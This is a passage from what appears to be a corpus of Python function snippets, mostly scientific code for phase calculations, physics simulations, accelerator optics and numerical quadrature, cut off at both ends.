np.array([np.pi/2,np.pi/2,np.pi/2]) + k*omegas\n \n return estimatedPhase", "def get_phase_data(self, space):\n if not space:\n return self\n ##dim = len(space)\n phases = set(self.phases)\n others = set(self.phases_by_elt.keys()) - set(space)\n for elt in others:\n phases -= self.phases_by_elt[elt]\n pd = PhaseData()\n pd.phases = phases\n return pd", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. 
If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def em_phase(indivs):\r\n\t#get the start frequency using dirichlet distribution.\r\n\thyplo_collection=[]\r\n\tindiv_dict=defaultdict(list)\r\n\t# hyplo_dict=defaultdict(float)\r\n\tres=[]\r\n\tres_pairs=[]\r\n\tfor x in indivs:\r\n\t\tdecom=decompose_acurate(x)\r\n\t\tindiv_dict[x]+=decom\r\n\t\thyplo_collection+=list(itertools.chain.from_iterable(decom))\r\n\treturn em(indiv_dict, hyplo_collection)", "def make_phase(mag, omega, phi, samples, end_time):\n\n array_time = np.linspace(0, end_time, samples)\n\n x = omega * array_time + phi\n\n return to_complex(mag, x), array_time", "def Spherical_aberrations_surface_addup(self):\n bf=beam_field()\n bf.U=np.array([[[0,0,1],[0,0,1],[0,0,1]]])\n pp=self.entrance_pupil\n bf.Q_p=np.array([[[0,0,0],[0,pp/10.,0],[0,pp,0]]]) \n bf.propagate(self.surfaces)\n i,x=bf.calculate_intersections(bf.U[:,[0]],bf.Q_p[:,[0]],bf.U[:,[1]],bf.Q_p[:,[1]])\n \n i2,x2=bf.calculate_intersections(bf.U[:,[0]],bf.Q_p[:,[0]],bf.U[:,[2]],bf.Q_p[:,[2]])\n \n #print(i[:,:,2]-i2[:,:,2])", "def pro_avfid_superoperator_compsubspace_phasecorrected(U,L1,phases):\n\n Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],\n [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],\n [0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0],\n [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],\n [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],\n [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0],\n [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0])), 0, 0],\n [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[1])), 0],\n [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[0]))]],\n type='oper',\n dims=[[3, 3], [3, 3]])\n\n if U.type=='oper':\n U=Ucorrection*U\n inner = U.dag()*U_target\n part_idx = [0, 1, 3, 4] # only computational subspace\n ptrace = 0\n for i in part_idx:\n ptrace += inner[i, i]\n dim = 4 # 2 qubits comp subspace \n\n return np.real(((np.abs(ptrace))**2+dim*(1-L1))/(dim*(dim+1)))\n\n elif U.type=='super':\n U=qtp.to_super(Ucorrection)*U\n kraus_form = qtp.to_kraus(U)\n dim=4 # 2 qubits in the computational subspace\n part_idx = [0, 1, 3, 4] # only computational subspace\n psum=0\n for A_k in kraus_form:\n ptrace = 0\n inner = U_target_diffdims.dag()*A_k # otherwise dimension mismatch\n for i in part_idx:\n ptrace += inner[i, i]\n psum += (np.abs(ptrace))**2\n\n return np.real((dim*(1-L1) + psum) / (dim*(dim + 1)))", "def plot_phase_plane_closed_loop( self , x_axis = 0 , y_axis = 1 ):\n\n pp = phaseanalysis.PhasePlot( self.plant , x_axis , y_axis )\n \n pp.compute_grid()\n pp.plot_init()\n \n # Closed-loop 
Behavior\n pp.color = 'b'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n # Open-Loop Behavior\n pp.f = self.fzbar # assume default internal states\n pp.ubar = self.ubar\n pp.color = 'r'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n pp.plot_finish()\n \n return pp", "def get_phases(getllm_d, mad_twiss, ListOfFiles, tune_q, plane):\r\n commonbpms = utils.bpm.intersect(ListOfFiles)\r\n commonbpms = utils.bpm.model_intersect(commonbpms, mad_twiss)\r\n commonbpms = JPARC_intersect(plane, getllm_d, commonbpms)\r\n length_commonbpms = len(commonbpms)\r\n\r\n if length_commonbpms < 3:\r\n print >> sys.stderr, \"get_phases: Less than three BPMs provided for plane \" + plane + \". Please check input.\"\r\n return [{}, 0, 0, []]\r\n\r\n #-- Last BPM on the same turn to fix the phase shift by tune_q for exp data of LHC\r\n # this would be the elegant way:\r\n \r\n if getllm_d.lhc_phase == \"1\":\r\n if getllm_d.accel == \"JPARC\":\r\n s_lastbpm = None\r\n elif getllm_d.accel == \"LHCB1\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L2.B1']]\r\n elif getllm_d.accel == \"LHCB2\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L8.B2']]\r\n elif getllm_d.accel == \"PETRA\":\r\n s_lastbpm = mad_twiss.S[mad_twiss.indx['BPM_SOR_46']]\r\n \r\n # this is the practical way:\r\n \r\n# if getllm_d.lhc_phase == \"1\":\r\n# print \"phase jump is compensated [get_phases]\"\r\n# if \"MOH.3\" in mad_twiss.NAME:\r\n# getllm_d.beam_direction = 1.0\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['MOH.5']]\r\n# tune_q = 0\r\n# print \"--> for JPARC (at S = {0:f} tune_q = {1:f}, bd = {2:f})\".format(s_lastbpm, tune_q, getllm_d.beam_direction)\r\n# #s_lastbpm = mad_twiss.S[mad_twiss.indx['MOH.5']]\r\n# elif \"BPMSW.1L2.B1\" in mad_twiss.NAME:\r\n# print \"--> for LHC\"\r\n# if getllm_d.accel == \"LHCB1\":\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L2.B1']]\r\n# elif getllm_d.accel == \"LHCB2\":\r\n# s_lastbpm = mad_twiss.S[mad_twiss.indx['BPMSW.1L8.B2']]\r\n# \r\n\r\n mu = 0.\r\n tunem = []\r\n phase = {} # Dictionary for the output containing [average phase, rms error]\r\n\r\n for i in range(length_commonbpms): # To calculate the tune\r\n bpm = str.upper(commonbpms[i % length_commonbpms][1])\r\n\r\n tunemi = []\r\n for src_twiss in ListOfFiles:\r\n # Phase is in units of 2pi\r\n if plane == 'H':\r\n src_twiss_tune_column = src_twiss.TUNEX\r\n elif plane == 'V':\r\n src_twiss_tune_column = src_twiss.TUNEY\r\n tunemi.append(src_twiss_tune_column[src_twiss.indx[bpm]])\r\n\r\n tunemi = np.array(tunemi)\r\n if i < length_commonbpms-1:\r\n tunem.append(np.average(tunemi))\r\n\r\n # Note that the phase advance between the last monitor and the first monitor should be find by taking into account the fractional part of tune.\r\n if i == length_commonbpms-2:\r\n tunem = np.array(tunem)\r\n tune = np.average(tunem)\r\n\r\n for i in range(length_commonbpms): # To find the integer part of tune as well, the loop is up to the last monitor\r\n bpms = [str.upper(commonbpms[j % length_commonbpms][1]) for j in range(i, i+11)] # seven consecutive monitors\r\n p_i = {1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[], 10:[]} # dict for the six bpm pairs i.e. 
p_i[1] is for pair bpm[0], bpm[1]\r\n \r\n \r\n if bpms[0] in getllm_d.important_pairs:\r\n number = 1\r\n for second_bpm in getllm_d.important_pairs[bpms[0]]:\r\n p_i[10 + number] = []\r\n bpms.append(second_bpm)\r\n number += 1\r\n \r\n for src_twiss in ListOfFiles:\r\n # Phase is in units of 2pi\r\n p_m = {}\r\n if plane == 'H':\r\n twiss_column = src_twiss.MUX\r\n elif plane == 'V':\r\n twiss_column = src_twiss.MUY\r\n for bpm_pair in p_i:\r\n try:\r\n p_m[bpm_pair] = twiss_column[src_twiss.indx[bpms[bpm_pair]]] - twiss_column[src_twiss.indx[bpms[0]]]\r\n except:\r\n p_m[bpm_pair] = 10000000000\r\n \r\n #-- To fix the phase shift by tune_q in LHC\r\n if tune_q is not None:\r\n try:\r\n for bpm_pair in p_m:\r\n if mad_twiss.S[mad_twiss.indx[bpms[0]]] <= s_lastbpm and mad_twiss.S[mad_twiss.indx[bpms[bpm_pair]]] > s_lastbpm:\r\n p_m[bpm_pair] += getllm_d.beam_direction*tune_q\r\n if mad_twiss.S[mad_twiss.indx[bpms[0]]] > s_lastbpm and mad_twiss.S[mad_twiss.indx[bpms[bpm_pair]]]<=s_lastbpm:\r\n p_m[bpm_pair] += -getllm_d.beam_direction*tune_q\r\n except:\r\n pass\r\n for bpm_pair in p_i:\r\n if p_m[bpm_pair] < 0:\r\n p_m[bpm_pair] += 1\r\n p_i[bpm_pair].append(p_m[bpm_pair])\r\n\r\n for bpm_pair in p_i:\r\n p_i[bpm_pair] = np.array(p_i[bpm_pair])\r\n\r\n if getllm_d.beam_direction == -1: # for the beam circulating reversely to the model\r\n for bpm_pair in p_i:\r\n p_i[bpm_pair] = 1 - p_i[bpm_pair]\r\n\r\n p_std = {}\r\n for bpm_pair in p_i:\r\n p_std[bpm_pair] = calc_phase_std(p_i[bpm_pair], 1.)\r\n p_i[bpm_pair] = calc_phase_mean(p_i[bpm_pair], 1.)\r\n\r\n if i >= length_commonbpms-10:\r\n p_i[10] = _phi_last_and_last_but_one(p_i[10], tune)\r\n for j in range(1,10):\r\n if i >= length_commonbpms-j:\r\n p_i[j] = _phi_last_and_last_but_one(p_i[j], tune)\r\n\r\n p_mdl = {}\r\n if plane == 'H':\r\n twiss_column = mad_twiss.MUX\r\n elif plane == 'V':\r\n twiss_column = mad_twiss.MUY\r\n for bpm_pair in p_i:\r\n p_mdl[bpm_pair] = twiss_column[mad_twiss.indx[bpms[bpm_pair]]] - twiss_column[mad_twiss.indx[bpms[0]]]\r\n\r\n if i >= length_commonbpms-10:\r\n if plane == 'H':\r\n madtune = mad_twiss.Q1 % 1\r\n elif plane == 'V':\r\n madtune = mad_twiss.Q2 % 1\r\n if madtune > .5:\r\n madtune -= 1\r\n\r\n p_mdl[10] = p_mdl[10] % 1\r\n p_mdl[10] = _phi_last_and_last_but_one(p_mdl[10], madtune)\r\n for j in range(1, len(p_i)): # iterate only over the first 5 bpm pairs\r\n if i >= length_commonbpms-j:\r\n p_mdl[j] = p_mdl[j] % 1\r\n p_mdl[j] = _phi_last_and_last_but_one(p_mdl[j], madtune)\r\n\r\n small = 1e-7\r\n phase_advances_all_bpms = np.zeros(len(p_i))\r\n phase_advances_all_bpms_std = np.zeros(len(p_i))\r\n for bpm_pair in p_i:\r\n if abs(p_mdl[bpm_pair]) < small:\r\n p_mdl[bpm_pair] = small\r\n print \"Note: Phase advance (Plane\" + plane + \") between \" + bpms[0] + \" and \" + bpms[bpm_pair] + \" in MAD model is EXACTLY n*pi. GetLLM slightly differ the phase advance here, artificially.\"\r\n print \"Beta from amplitude around this monitor will be slightly varied.\"\r\n if abs(p_i[bpm_pair]) < small:\r\n p_i[bpm_pair] = small\r\n print \"Note: Phase advance (Plane\" + plane + \") between \" + bpms[0] + \" and \" + bpms[bpm_pair] + \" in measurement is EXACTLY n*pi. 
GetLLM slightly differ the phase advance here, artificially.\"\r\n print \"Beta from amplitude around this monitor will be slightly varied.\"\r\n phase[\"\".join([plane,bpms[0],bpms[bpm_pair]])] = [p_i[bpm_pair], p_std[bpm_pair], p_mdl[bpm_pair]]\r\n\r\n for i in range(len(p_i)):\r\n phase_advances_all_bpms[i] = p_i[i+1]\r\n phase_advances_all_bpms_std[i] = p_std[i+1]\r\n\r\n best_bpm_idx = (np.abs(phase_advances_all_bpms[:3]-0.25)).argmin()\r\n \r\n best_90degrees_bpm = bpms[best_bpm_idx + 1]\r\n best_90degrees_phase = phase_advances_all_bpms[best_bpm_idx]\r\n best_90degrees_phase_std = phase_advances_all_bpms_std[best_bpm_idx]\r\n \r\n phase[bpms[0]] = [p_i[1], p_std[1], p_i[2], p_std[2], p_mdl[1], p_mdl[2], bpms[1], best_90degrees_bpm, best_90degrees_phase, best_90degrees_phase_std]\r\n\r\n return [phase, tune, mu, commonbpms]", "def phase_Venus_2(alpha):\n phase = 10.**(-0.4*( - 2.81914e-00*alpha + 8.39034e-03*alpha**2.))\n #1 Scale Properly\n h1 = phase_Venus_1(163.7) - 0. #Total height desired over range\n h2 = 10.**(-0.4*( - 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)) - 10.**(-0.4*( - 2.81914e-00*179. + 8.39034e-03*179.**2.))\n phase = phase * h1/h2 #Scale so height is proper\n #2 Lateral movement to make two functions line up\n difference = phase_Venus_1(163.7) - h1/h2*(10.**(-0.4*( - 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)))\n phase = phase + difference\n\n # + \n #-(- 2.81914e-00*163.7 + 8.39034e-03*163.7**2.)\n # - 1.\n return phase", "def _ampl_phase(self, coeffs):\n return coeffs[:len(coeffs)/2], coeffs[len(coeffs)/2:]", "def phase_Earth(alpha):\n phase = 10.**(-0.4*(- 1.060e-3*alpha + 2.054e-4*alpha**2.))\n return phase", "def processPhaseSequence(self):\n phasesInRing1, phasesInRing2 = ([] for i in range(2))\n\n [phasesInRing1.append(index+1) for index, value in enumerate(self.phaseDurationList) if value > 0.0 and index < 4]\n [phasesInRing2.append(index+1) for index, value in enumerate(self.phaseDurationList) if value > 0.0 and index >= 4]\n\n if len(phasesInRing1) > 0 and len(phasesInRing2) > 0:\n self.phaseSequenceInRing1.extend(phasesInRing1)\n self.phaseSequenceInRing2.extend(phasesInRing2)\n\n self.processPhaseHeight(phasesInRing1, phasesInRing2)", "def combine_phase(laz, raz, grf_lf_ind, grf_rf_ind, hz, acc_hip_z, acc_hip_x, total_accel):\n # reshape for faster computation\n laz = laz.values.reshape(-1, )\n raz = raz.values.reshape(-1, )\n\n # Check and mark rows with missing data\n length = len(laz)\n missing_data = False\n nan_row = []\n if np.isnan(laz).any() or np.isnan(raz).any():\n missing_data = True\n if missing_data:\n nan_row = np.where(np.isnan(laz) | np.isnan(raz))[0]\n finite_row = np.array(list(set(range(length)) - set(nan_row)))\n laz = np.delete(laz, nan_row, )\n raz = np.delete(raz, nan_row, )\n\n # Filter through low-pass filter\n la_magn = filter_data(laz, filt='low', highcut=ct.cutoff_magn, fs=hz)\n ra_magn = filter_data(raz, filt='low', highcut=ct.cutoff_magn, fs=hz)\n\n acc_hip_z = filter_data(acc_hip_z, filt='low', highcut=6)\n acc_hip_x = filter_data(acc_hip_x, filt='low', highcut=40)\n acc_hip = filter_data(total_accel, filt='low', highcut=15)\n\n # Get balance/movement phase and start and end of movement phase for both\n # right and left foot\n lf_ph, lf_sm, lf_em = _body_phase(la_magn, hz)\n rf_ph, rf_sm, rf_em = _body_phase(ra_magn, hz)\n\n _impact_detect(phase=lf_ph,\n start_move=lf_sm,\n end_move=lf_em,\n grf=grf_lf_ind,\n acc_hip_z=acc_hip_z,\n acc_hip_x=acc_hip_x,\n acc_hip=acc_hip) # detect and add impacts\n del lf_sm, lf_em # no 
use in further computations\n\n _impact_detect(phase=rf_ph,\n start_move=rf_sm,\n end_move=rf_em,\n grf=grf_rf_ind,\n acc_hip_z=acc_hip_z,\n acc_hip_x=acc_hip_x,\n acc_hip=acc_hip) # detect and add impacts\n del rf_sm, rf_em, raz # no use in further computations\n\n # Insert previous value for phase where data needed to predict was missing\n if missing_data:\n phase_lf = np.ones(length).astype(int)\n phase_lf[finite_row] = lf_ph\n phase_rf = np.ones(length).astype(int)\n phase_rf[finite_row] = rf_ph\n for i in nan_row:\n phase_lf[i] = phase_lf[i - 1]\n phase_rf[i] = phase_rf[i - 1]\n else:\n phase_lf, phase_rf = lf_ph, rf_ph\n\n return phase_lf, phase_rf", "def step(self):\n lmax = 32\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def D1(t, s, m):\n return 1 / 3 * np.sum((ph[2::2] - ph[:-2:2]) *\n (np.cos(m * ph[:-2:2] * star.rho[:-2:2, t, s])\n + 4 * np.cos(m * ph[1:-1:2] * star.rho[1:-1:2, t, s]) +\n np.cos(m * ph[2::2] * star.rho[2::2, t, s])))\n\n def D2(s, l, m):\n sum = 0\n for t in range(0, K - 2, 2):\n sum += (mu[t + 2] - mu[t]) * (lpmv(m, l, mu[t]) * D1(t, s, m) +\n 4 * lpmv(m, l, mu[t + 1]) * D1(t + 1, s, m) +\n lpmv(m, l, mu[t + 2]) * D1(t + 2, s, m))\n\n return sum / 3\n\n def D3(l, m, k):\n sum = 0\n\n def fl(r_dash, r):\n if r_dash < r:\n return r_dash**(l + 2) / r**(l + 1)\n else:\n return r**l / r_dash**(l - 1)\n\n for s in range(0, N - 2, 2):\n sum += (r[s + 2] - r[s]) * (fl(r[s], r[k]) * D2(s, l, m) +\n 4 * fl(r[s + 1], r[k]) * D2(s + 1, l, m) +\n fl(r[s + 2], r[k]) * D2(s + 2, l, m))\n\n return sum / 6\n\n def calc_Phi(i, j, k):\n Phi = 0\n\n for l in range(lmax + 1):\n for m in range(min(l + 1, 2)):\n if (m + l % 2 == 1):\n continue\n if m == 0:\n eps = 1\n else:\n eps = 2\n Phi -= eps / factorial(1 + m) * \\\n D3(l, m, k) * lpmv(m, l, mu[j]) * np.cos(m * ph[i])\n\n return Phi\n\n # calculate Phi across grid\n for n in range(N):\n for k in range(K):\n for m in range(M):\n star.Phi[m, k, n] = calc_Phi(m, k, n)\n\n print(f'Phi = {star.Phi[0,0,:]}')\n\n # update the enthalpy\n\n Omega2 = star.eos.Omega2(star.Phi, star.Psi)\n C = star.eos.C(star.Phi, star.Psi)\n\n H = C - star.Phi - Omega2 * star.Psi\n\n # use new enthalpy and Phi to calculate the density\n\n star.rho = star.eos.rho_from_h(H)\n star.rho /= np.max(star.rho)\n\n print(f\"rho = {np.average(star.rho[:,0,:], axis=0)}\")\n\n # make sure density is always non-negative\n # star.rho[star.rho < 0] = 0\n\n print(f\"rho = {np.average(star.rho[:,0,:], axis=0)}\")\n\n # calculate the errors\n\n H_err = np.max(np.abs(H - star.H)) / np.max(np.abs(H))\n\n if np.max(Omega2) == 0:\n if np.abs(Omega2 - star.Omega2) == 0:\n Omega2_err = 0\n else:\n Omega2_err = 1\n else:\n Omega2_err = np.abs(Omega2 - star.Omega2) / np.abs(Omega2)\n\n if np.max(star.C) == 0:\n if np.abs(C - star.C) == 0:\n C_err = 0\n else:\n C_err = 1\n else:\n C_err = np.abs(C - star.C) / np.abs(star.C)\n\n # set variables to new values\n\n star.H = H\n star.Omega2 = Omega2\n star.C = C\n print(\n f\"Errors: H_err = {H_err}, Omega2_err = {Omega2_err}, C_err = {C_err}\")\n\n return H_err, Omega2_err, C_err", "def _compute_normalized_phase(data):\n return (np.angle(hilbert(data)) + np.pi) / (2 * np.pi)", "def calculateElementQuadrature(self):\n #\n #get physical locations of quadrature points and jacobian information there\n #assume all components live on the same mesh\n #\n #mwf debug\n #import pdb\n #pdb.set_trace()\n 
self.u[0].femSpace.elementMaps.getValues(self.elementQuadraturePoints,\n self.q['x'])\n if self.movingDomain:\n if self.tLast_mesh != None:\n self.q['xt'][:]=self.q['x']\n self.q['xt']-=self.q['x_last']\n alpha = 1.0/(self.t_mesh - self.tLast_mesh)\n self.q['xt']*=alpha\n else:\n self.q['xt'][:]=0.0\n self.q['x_last'][:]=self.q['x']\n self.u[0].femSpace.elementMaps.getJacobianValues(self.elementQuadraturePoints,\n self.q['J'],\n self.q['inverse(J)'],\n self.q['det(J)'])\n self.q['abs(det(J))']=numpy.absolute(self.q['det(J)'])\n #\n # get physical space integration weights\n #\n self.q['dV'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n cfemIntegrals.calculateIntegrationWeights(self.q['abs(det(J))'],\n self.elementQuadratureWeights[('u',0)],\n self.q['dV'])\n for ci in range(self.nc): self.q[('dV_u',ci)] = self.q['dV']\n #\n #get shape information at the quadrature points\n #\n self.testSpace[0].getBasisValues(self.elementQuadraturePoints,\n self.q[('w',0)])\n cfemIntegrals.calculateWeightedShape(self.elementQuadratureWeights[('u',0)],\n self.q['abs(det(J))'],\n self.q[('w',0)],\n self.q[('w*dV',0)])\n cfemIntegrals.calculateWeightedShape(self.elementQuadratureWeights[('m',0)],\n self.q['abs(det(J))'],\n self.q[('w',0)],\n self.q[('w*dV_m',0)])\n self.testSpace[0].getBasisGradientValues(self.elementQuadraturePoints,\n self.q['inverse(J)'],\n self.q[('grad(w)',0)])\n cfemIntegrals.calculateWeightedShapeGradients(self.elementQuadratureWeights[('u',0)],\n self.q['abs(det(J))'],\n self.q[('grad(w)',0)],\n self.q[('grad(w)*dV',0)])\n\n #\n self.ellamDiscretization.updateElementQuadrature(self.q)\n #\n self.coefficients.initializeElementQuadrature(self.timeIntegration.t,self.q)", "def step_4(f: Callable[..., float], x: float, y: np.array, params: Tuple,\\\n h: float, k3: np.array) -> np.array:\n\n # Initialize the output vector.\n n = len(y)\n y_int = np.zeros(n)\n\n # Find dym/dx using the given function, then use it to compute dym-1/dx.\n y_int[0] = f(x + h, y + k3, *params) * h\n\n # Starting with dym-1/dx, compute the other values down to y/dx.\n for i in range(1, n):\n y_int[i] = (y[n-i] + k3[n-1]) * h\n\n # Reverse the output vector so y/dx is on top.\n y_int = np.flipud(y_int)\n\n return y_int", "def findphase(self):\n debug('ControllerStartup.findphase()')\n if not self.pidevice.HasFPH() or self.prop['skipfph']:\n return\n if not self._databuf['cstdone']:\n debug('no need to do find phase for axes %r', self.pidevice.axes)\n return\n for axis in self._databuf['cstdone']:\n if self.pidevice.qFRF(axis)[axis]:\n self.pidevice.FPH(axis)\n waitonphase(self.pidevice, **self._kwargs)\n self.pidevice.WPA()\n else:\n info('skip find phase for axis while axis %s is not referenced' % axis)", "def phosphorene_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [-s/2, -ay/2, h], 0),\n ('B', [ s/2, -ay/2, 0], 0),\n ('C', [-s/2 + ax/2, 0, 0], 0),\n ('D', [ s/2 + ax/2, 0, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 
1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5')\n )\n\n return lat", "def horde_step(self, observation):", "def phase(self):\n return -self.attrs['RFphase']*2*np.pi", "def _set_phase(self):\n self.phase = np.sign(self._model())", "def phase(self):\n return 0.0 * self.__weights", "def RTSpace( ref_el , deg ):\n sd = ref_el.get_spatial_dimension()\n\n vec_Pkp1 = polynomial_set.ONPolynomialSet( ref_el , deg+1 , (sd,) )\n\n dimPkp1 = expansions.polynomial_dimension( ref_el , deg+1 )\n dimPk = expansions.polynomial_dimension( ref_el , deg )\n dimPkm1 = expansions.polynomial_dimension( ref_el , deg-1 )\n\n vec_Pk_indices = reduce( lambda a,b: a+b , \\\n [ list(range(i*dimPkp1,i*dimPkp1+dimPk)) \\\n for i in range(sd) ] )\n vec_Pk_from_Pkp1 = vec_Pkp1.take( vec_Pk_indices )\n\n Pkp1 = polynomial_set.ONPolynomialSet( ref_el , deg + 1 )\n PkH = Pkp1.take( list(range(dimPkm1,dimPk)) )\n\n Q = quadrature.make_quadrature( ref_el , 2 * deg + 2 )\n\n # have to work on this through \"tabulate\" interface\n # first, tabulate PkH at quadrature points\n Qpts = numpy.array( Q.get_points() )\n Qwts = numpy.array( Q.get_weights() )\n\n zero_index = tuple( [ 0 for i in range(sd) ] )\n\n PkH_at_Qpts = PkH.tabulate( Qpts )[zero_index]\n Pkp1_at_Qpts = Pkp1.tabulate( Qpts )[zero_index]\n\n PkHx_coeffs = numpy.zeros( (PkH.get_num_members() , \\\n sd, \\\n Pkp1.get_num_members()) , \"d\" )\n\n import time\n t1 = time.time()\n for i in range( PkH.get_num_members() ):\n for j in range( sd ):\n fooij = PkH_at_Qpts[i,:] * Qpts[:,j] * Qwts\n PkHx_coeffs[i,j,:] = numpy.dot( Pkp1_at_Qpts , fooij )\n\n PkHx = polynomial_set.PolynomialSet( ref_el , \\\n deg , \\\n deg + 1 , \\\n vec_Pkp1.get_expansion_set() , \\\n PkHx_coeffs , \\\n vec_Pkp1.get_dmats() )\n\n return polynomial_set.polynomial_set_union_normalized( vec_Pk_from_Pkp1 , PkHx )", "def Build_quadrant(self) :\n\n self.omega = np.zeros((self.n_dir,3))\n self.weight = np.zeros((self.n_dir))\n\n if self.sn==2 :\n direction = 0.577350269189625764509149\n weight = 1.\n\n self.omega[0,0] = direction\n self.omega[0,1] = direction\n self.omega[0,2] = direction\n \n self.weight[0] = weight\n \n elif self.sn==4 :\n direction_1 = 0.350021174581540677777041\n direction_2 = 0.868890300722201205229788\n weight = 1./3.\n\n self.omega[0,0] = direction_2\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_1\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_1\n self.omega[2,2] = direction_2\n\n self.weight[0] = weight\n self.weight[1] = weight\n self.weight[2] = weight\n\n elif self.sn==6 :\n direction_1 = 0.266635401516704720331535\n direction_2 = 0.681507726536546927403750\n direction_3 = 0.926180935517489107558380\n weight_1 = 0.176126130863383433783565\n weight_2 = 0.157207202469949899549768\n\n self.omega[0,0] = direction_3\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_2\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_1\n 
self.omega[3,2] = direction_2\n \n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_2\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_1\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_3\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_1\n self.weight[3] = weight_2\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n\n elif self.sn==8 :\n direction_1 = 0.218217890235992381266097\n direction_2 = 0.577350269189625764509149\n direction_3 = 0.786795792469443145800830\n direction_4 = 0.951189731211341853132399\n\n weight_1 = 0.120987654320987654320988\n weight_2 = 0.0907407407407407407407407\n weight_3 = 0.0925925925925925925925926\n\n self.omega[0,0] = direction_4\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_3\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_2\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_1\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_3\n self.omega[4,1] = 